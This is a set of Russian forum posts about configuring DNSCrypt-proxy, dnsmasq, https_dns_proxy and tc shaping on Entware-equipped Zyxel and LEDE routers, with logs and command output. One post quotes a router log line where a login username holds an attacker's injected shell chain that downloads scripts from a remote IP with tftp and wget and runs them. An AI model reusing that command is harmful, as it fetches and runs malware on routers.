vasek00

Улучшена работа DNSCrypt-proxy тестовое обновление http://entware-3x.zyxmon.org/binaries/mipsel/test/dnscrypt-proxy_1.9.5-4a_mipsel-3x.ipk и http://entware-3x.zyxmon.org/binaries/mipsel/test/libsodium_1.0.13-1_mipsel-3x.ipk

Смотрю дальше, проблем пока не видно, если не смотреть данный лог от dnscrypt-proxy то все ОК. Сервер пока один cisco протокл UDP.

Мне вот интересно какое отношение ко всему этому имеет [E] Aug 9 01:41:22 ndm: Core::Authenticator: no such user: "cd /tmp || cd /mnt || cd /var; tftp -r tftp.sh -g 89.248.162.146; sh tftp.sh; wget http://89.248.162.146/bin.sh; sh bin.sh; busybox wget http://89.248.162.146/bin1.sh; sh bin1.sh". скачать tftp.sh запустить его и далее два bin (это html страница для вывода на экрна информации про Wowza Media Server)

За сутки с небольшим - анализ работы на много лучше чем было ранее (ощущение по отзывчивости). Так проверял в основном udp работу при конфиге ниже : Созданный dnscrypt-proxy.60053.log чистый с момента запуска в нем тишина. Пока без замечаний. Sun Aug 5 11:39:29 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5 Sun Aug 5 11:39:29 2017 [INFO] Generating a new session key pair Sun Aug 5 11:39:29 2017 [INFO] Done Sun Aug 5 11:39:29 2017 [INFO] Server certificate with serial #1493333488 received Sun Aug 5 11:39:29 2017 [INFO] This certificate is valid Sun Aug 5 11:39:29 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24] Sun Aug 5 11:39:29 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Sun Aug 5 11:39:29 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778 Sun Aug 5 11:39:29 2017 [NOTICE] Proxying from 127.0.0.2:60053 to 208.67.220.220:443 Sun Aug 5 12:41:00 2017 [INFO] Refetching server certificates Sun Aug 5 12:41:00 2017 [INFO] Server certificate with serial #1493333488 received Sun Aug 5 12:41:00 2017 [INFO] This certificate is valid Sun Aug 5 12:41:00 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24] Sun Aug 5 12:41:00 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy. Sun Aug 5 12:41:00 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778 .... По dnsmasq log Выяснился еще один баг или точнее не баг, а то как настроена система. Клиент ping на адрес из /opt/tmp/malwaredom_block.host - "0.0.0.0 www.w......o.com" на клиенте все нормально, но если выполнять локально на роутере, то получаем Решение проблемы настройка более правельнее ниже Теперь все правельно. Текущий конфиг для DNSmasq более оптимальный для работы, вопрос открытый только по какому варианту работает ПРОШИВКА если ей нужно обратиться по мнемонике - тут два варианта "localhost:domain" или по интерфейсу "br0:domain"

Это понятно, нужно время на оценку возможной проблемы (по сравнению с той что была) и то что она случайная или постоянная.

Ну вообще порадовали. Пока все запустилось.

ОК и СПС Поставил, запустил. Разберусь с релизами сейчас. /opt/etc/init.d # lsof | grep libsodium dnscrypt- 5301 root mem REG 8,2 464288 4357 /opt/lib/libsodium.so.18.3.0 /opt/etc/init.d # Да это он _sodium_malloc 1.0.13 ...

Я его dnscrypt proxy пока отключил переименовав скрипт запуска S* на K*, и пробую связку dnsmasq+https_dns_proxy

После недельного "тупизма" на роутере при связке dnsmasq+dnscrypt-proxy тупизм в том что при настройках (даже когда в схеме один роутер + интернет) когда по долгу читаешь страницы в интернете то появляются куча localhost:38552 localhost:domain TIME_WAIT или udp 17 26 src=127.0.0.1 dst=127.0.0.1 sport=56695 dport=60053 packets=10 bytes=680 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=56695 packets=0 bytes=0 mark=0 use=2 udp 17 16 src=127.0.0.1 dst=127.0.0.1 sport=56846 dport=60053 packets=10 bytes=570 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=56846 packets=0 bytes=0 mark=0 use=2 udp 17 9 src=127.0.0.1 dst=127.0.0.1 sport=38305 dport=60053 packets=10 bytes=610 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=38305 packets=0 bytes=0 mark=0 use=2 udp 17 12 src=127.0.0.1 dst=127.0.0.1 sport=13396 dport=60053 packets=10 bytes=630 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=13396 packets=0 bytes=0 mark=0 use=2 udp 17 9 src=127.0.0.1 dst=127.0.0.1 sport=10493 dport=60053 packets=2 bytes=112 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=10493 packets=0 bytes=0 mark=0 use=2 udp 17 5 src=127.0.0.1 dst=127.0.0.1 sport=41603 dport=60053 packets=10 bytes=710 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=41603 packets=0 bytes=0 mark=0 use=2 udp 17 3 src=127.0.0.1 dst=127.0.0.1 sport=9064 dport=60053 packets=10 bytes=600 [UNREPLIED] src=127.0.0.1 dst=127.0.0.1 sport=60053 dport=9064 packets=0 bytes=0 mark=0 use=2 а так же пролет запроса DNS не туда куда надо udp 17 20 src=IP_белый_Zyxel dst=IP_DNS_провайдера sport=48138 dport=53 packets=1 bytes=66 src=IP_DNS_провайдера dst=IP_белый_Zyxel sport=53 dport=48138 packets=1 bytes=116 mark=0 use=2 из-за dnsmasq 907 nobody 4u IPv4 2691 0t0 UDP 192.168.1.100:domain dnsmasq 907 nobody 5u IPv4 2692 0t0 TCP 192.168.1.100:domain (LISTEN) dnsmasq 907 nobody 6u IPv4 2693 0t0 UDP localhost:domain dnsmasq 907 nobody 7u IPv4 2694 0t0 TCP localhost:domain (LISTEN) dnsmasq 907 nobody 8u IPv6 2695 0t0 UDP [fe80::...:e2a8]:domain dnsmasq 907 nobody 9u IPv6 2696 0t0 TCP [fe80::...:e2a8]:domain (LISTEN) dnsmasq 907 nobody 10u IPv6 2697 0t0 UDP localhost:domain dnsmasq 907 nobody 11u IPv6 2698 0t0 TCP localhost:domain (LISTEN) Решил попробовать другую связку с dnsmasq+https_dns_proxy (до следующих обновлений сервисов dnsmasq dnscrypt-proxy и библиотек для них в Entware) 1.dnsmasq остаеться со своими настройками 2. https_dns_proxy насраивается на порт 60053 (сервера будут googla) ARGS="-a 127.0.0.1 -p 65053 -d" Итак имеем 9855 nobody 6256 S https_dns_proxy -a 127.0.0.1 -p 60053 -d tcp 0 0 localhost:domain 0.0.0.0:* LISTEN 907/dnsmasq tcp 0 0 192.168.1.100:domain 0.0.0.0:* LISTEN 907/dnsmasq tcp 0 0 localhost:domain :::* LISTEN 907/dnsmasq tcp 0 0 fe80::.........8:domain :::* LISTEN 907/dnsmasq udp 0 0 localhost:60053 0.0.0.0:* 9855/https_dns_prox udp 0 0 localhost:domain 0.0.0.0:* 907/dnsmasq udp 0 0 192.168.1.100:domain 0.0.0.0:* 907/dnsmasq udp 0 0 localhost:domain :::* 907/dnsmasq udp 0 0 fe80::................8:domain :::* 907/dnsmasq

В виду невозможности использовать конфиг для данного релиза DNSCrypt-proxy подправил dnsmasq и сам DNSCrypt-proxy (для пробы пока на два resolver - cisco и d0wn-ru-ns1) В результате получили два потока (шифрования) для DNS запросов на разные resolver с разными протоколами - cisco (поток UDP) и d0wn-ru-ns1 (поток TCP)

Возможно ли поднять в OPKG lib библиотеку /opt/etc/init.d # opkg list | grep libsodium libsodium - 1.0.12-1 - NaCl (pronounced "salt") is a new easy-to-use high-speed software library for network communication, encryption, decryption, signatures, etc. NaCl's goal is to provide all of the core operations needed to build higher-level cryptographic tools. Sodium is a portable, cross-compilable, installable, packageable fork of NaCl (based on the latest released upstream version nacl-20110221), with a compatible API. The design choices, particularly in regard to the Curve25519 Diffie-Hellman function, emphasize security (whereas NIST curves emphasize "performance" at the cost of security), and "magic constants" in NaCl/Sodium have clear rationales. The same cannot be said of NIST curves, where the specific origins of certain constants are not described by the standards. And despite the emphasis on higher security, primitives are faster across-the-board than most implementations of the NIST standards. /opt/etc/init.d # до релиза 1.0.13 https://github.com/jedisct1/dnscrypt-proxy/issues/542

Прояснить ситуация по данной команде - SWNAT bind table cleared, в какой момент она происходит релиз - 2.10. На роутере используется ip hotspot - т.е. не зарегистрированным клиентам не разрешен выход в интернет, но возникают моменты (когда долго не пользуешься интернетом, "фризы" на клиенте по просмотру страниц или к доступу на роутер WEB "фриз", решается ping на любой сайт на клиенте и потом все работает) ip hotspot host хх:хх:хх:хх:хх:хх permit .... default-policy deny На роутере стоит dnscrypt-proxy -> локальный сервис запущенный на 127.0.0.1:65553, т.е. работает пока есть запросы от клиента в интернет, если их нет долгое время то получаем "фриз" на клиенте, последний релиз 2.10 не исправляет ситуацию. Если опять же дать на клиенте ping на любой сайт то начинает работать. Попробую еще по наблюдать, так как dnscrypt-proxy все таки локальный сервис "не из коробки", но может есть какие либо ограничения на локальные сервисы, он весит на : Если ли какие timeout в данном сервисе ip hotspot например idle, keepalive, login или почему он считает что устройство не имеет разрешения на выход в интернет.

/#usb.cifs -> Рабочая группа -> WORKGROUP (такая же как на Win)

Я в курсе что tc в ней нет, но в вашем ответном сообщение на сообщение ниже т.е. ставим Entware и в нем есть tc => и какой вывод? /opt/sbin # tc -h Usage: tc [ OPTIONS ] OBJECT { COMMAND | help } tc [-force] -batch filename where OBJECT := { qdisc | class | filter | action | monitor | exec } OPTIONS := { -s[tatistics] | -d[etails] | -r[aw] | -p[retty] | -b[atch] [filename] | -n[etns] name | -nm | -nam[es] | { -cf | -conf } path } /opt/sbin # /opt/sbin # tc qdisc add dev br0 root handle 1: htb default 25 /opt/sbin # tc class add dev br0 parent 1: classid 1:1 htb rate 50000kbit ceil 10000kbit quantum 1500 /opt/sbin # tc filter add dev br0 protocol ip pref 1 handle 0x64 fw classid 1:100 Кое что по умолчанию (дисциплина pfifo_fast) и после введеных примеров строк /opt/sbin # tc qdisc show qdisc pfifo_fast 0: dev ezcfg0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev eth2 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev dsl_br0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev ra0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev eth2.1 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev eth2.2 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev eth2.3 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev cdc_br0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc htb 1: dev br0 root refcnt 2 r2q 10 default 25 direct_packets_stat 13443 qdisc pfifo_fast 0: dev br1 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev ppp0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 qdisc pfifo_fast 0: dev eth0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 /opt/sbin # /opt/sbin # tc class show /opt/sbin #

Он не нужен, т.е. например при использовании tc qdisc add dev $IF root handle 1: htb default 25 tc class add dev $IF parent 1: classid 1:1 htb rate ${UL}kbit ceil ${UL}kbit quantum $((${4}+18)) tc class add dev $IF parent 1:1 classid 1:2 htb rate $((75*${UL}/100))kbit ceil ${UL}kbit quantum $((${4}+18)) ... tc class add dev $IF parent 1:2 classid 1:100 htb rate $((75*${UL}/100))kbit ceil ${UL}kbit prio 0 quantum $((${4}+18)) tc class add dev $IF parent 1:3 classid 1:10 htb rate $((50*${UL}/100))kbit ceil ${UL}kbit prio 1 quantum $((${4}+18)) ... tc filter add dev $IF protocol ip pref 1 handle 0x64 fw classid 1:100 tc filter add dev $IF protocol ip pref 3 handle 0x0A fw classid 1:10 ... IF - нужный интерфейс проблем не будет?

И ни каких не стыковок не будет по netfilter или еще с чем-то подобным, а то настроишь а какой то сервис раз и все сбросит?

В системе два интерфейса выхода в интернет - стандартный конфиг, основной канал и резервный. В результате в системе появляется запись на странице #dashboard.status раздел DNS о всех известнаых серверах DNS на всех интерфейсах. Берем пример Windows 7 - поочередно делает запросы на сервера DNS в порядке очередности, Windows 10 уже взяла на вооружение часть алгоритма из Windows 8 (Win8 уже может "Smart Multi-Homed Name Resolution" если она включена то запросы на все известные DNS серверы из списка сразу на случай того если предпочитаемый не ответит, то чтоб не ждать имеем уже второй ответ от другого сервера DNS из списка) отличие в Win10 в том что берется ответ который пришел быстрее и уже с любого интерфейса. Суть предложения добавить функцию разрешения/запрещения посылать запрос DNS по основному и по резервному каналу, если с резервного пришел быстрее то его и использовать, но маршрут остается по основному каналу - при наличие в системе двух каналов. Если у пользователя лимитирован трафик или не желает ее использовать по каким либо причинам, то он всегда может ее не использовать. Тут все просто два канала хоть и в резерве, но за него заплачено и есть толк, то почему бы нет. Теперь по поводу запроса на сервера DNS - тут есть варианты два или более : 1 - один публичный = все просто запрос по обоим, на каком канале быстрее ответит (этот был бы интересен) 2. - провайдерские = тут опять все просто пров1 на свой провайд. DNS, пров2 на свой провайд. DNS и опять же от кого быстрее получиться ответ. Может конечно что и не так до понял в данном алгоритме.

Если как-то по проще то может посмотреть в сторону http://proft.me/2013/08/17/spravochnik-po-komandam-wget-i-curl/ http://forum.lissyara.su/viewtopic.php?t=35711&start=25

Но в нем есть функция поддержки не на помните чего и не чего не сказано, что если у вас будет сбой на том что подключили то для этого нужен будет ПК.

А я запорол две штуки, одну аж дважды Во всех случаях стояли два раздела Ext для entware маленький и второй большой для NTFS (DLNA мультики) - были грабли при записи на раздел NTFS для DLNA и одновременно просмотр - кирдык, log сразу на ошибки. Ну ладно по средней цене - ее просто поменял так как две недели не прошло (просто слет в режим блокировки, защита от записи) но одна DataTraveler_100_G3 (USB3 установили и забыли, т.е. не передергивали) слетела с аналогичным бзик, но восстановил через иголку, залил прошивку но потерял скорость на ней, проработала еще 3месяца, аналогичный бзик, но уже плюнул на восстановления. При создании второго раздела Ext скорость копирования на нее просто была равна 2-2,5 в максимуме. Есть так же старая 1GB USB2 (аж с переключателем блокировка записи 1GB размером) Ext стоит Entware - уже год без проблем.

Затратная для того кто свой раздел "Терабайтный" будет восстанавливать, для раздела в 2GB для Entware - думаю не проблема будет, да и о каком затрате идет речь если это то же самое будет как когда клиент заливает что-то на диск.

Что для устройства которое было выше и загрузка модулей

Про дрова не скажу, но root@LEDE:~# dmesg [ 0.000000] Linux version 4.4.71 (buildbot@builds-02.infra.lede-project.org) (gcc version 5.4.0 (LEDE GCC 5.4.0 r3102-0224e32) ) #0 Wed Jun 7 19:24:41 2017 [ 0.000000] SoC Type: Ralink RT3052 id:1 rev:3 ... root@LEDE:~# df Filesystem 1K-blocks Used Available Use% Mounted on /dev/root 2304 2304 0 100% /rom tmpfs 14404 1068 13336 7% /tmp /dev/mtdblock6 4608 484 4124 11% /overlay overlayfs:/overlay 4608 484 4124 11% / tmpfs 512 0 512 0% /dev root@LEDE:~# mount /dev/root on /rom type squashfs (ro,relatime) proc on /proc type proc (rw,nosuid,nodev,noexec,noatime) sysfs on /sys type sysfs (rw,nosuid,nodev,noexec,noatime) tmpfs on /tmp type tmpfs (rw,nosuid,nodev,noatime) /dev/mtdblock6 on /overlay type jffs2 (rw,noatime) overlayfs:/overlay on / type overlay (rw,noatime,lowerdir=/,upperdir=/overlay/upper,workdir=/overlay/work) tmpfs on /dev type tmpfs (rw,nosuid,relatime,size=512k,mode=755) devpts on /dev/pts type devpts (rw,nosuid,noexec,relatime,mode=600) debugfs on /sys/kernel/debug type debugfs (rw,noatime) root@LEDE:~# модули устанавливаются отдельно в /overlay root@LEDE:/overlay# df Filesystem 1K-blocks Used Available Use% Mounted on /dev/root 2304 2304 0 100% /rom tmpfs 14404 592 13812 4% /tmp /dev/mtdblock6 4608 4020 588 87% /overlay overlayfs:/overlay 4608 4020 588 87% / tmpfs 512 0 512 0% /dev root@LEDE:/overlay# В самой прошивке "рай" не вижу, так в ней станд.набор, все что нужно потом ставиться на нее отдельно из WEB, но пользователь должен чуток быть в курсе, что нужно поставить для работы модема от сотового оператора или для какого другого сервиса и т.д. Пробовал на RT3052 - с налета что-то не очень айс.

НЕ помеха чего - получить возможность передать несколько пакетов ( Probe Request / Probe Response они не мешают ) и УТКНУТЬСЯ ( Association Request / Association Response ) или проще ждемс пароль для БС. Не путайте понятие "защищать" свою сеть тут даже сетью сложно что-то представить.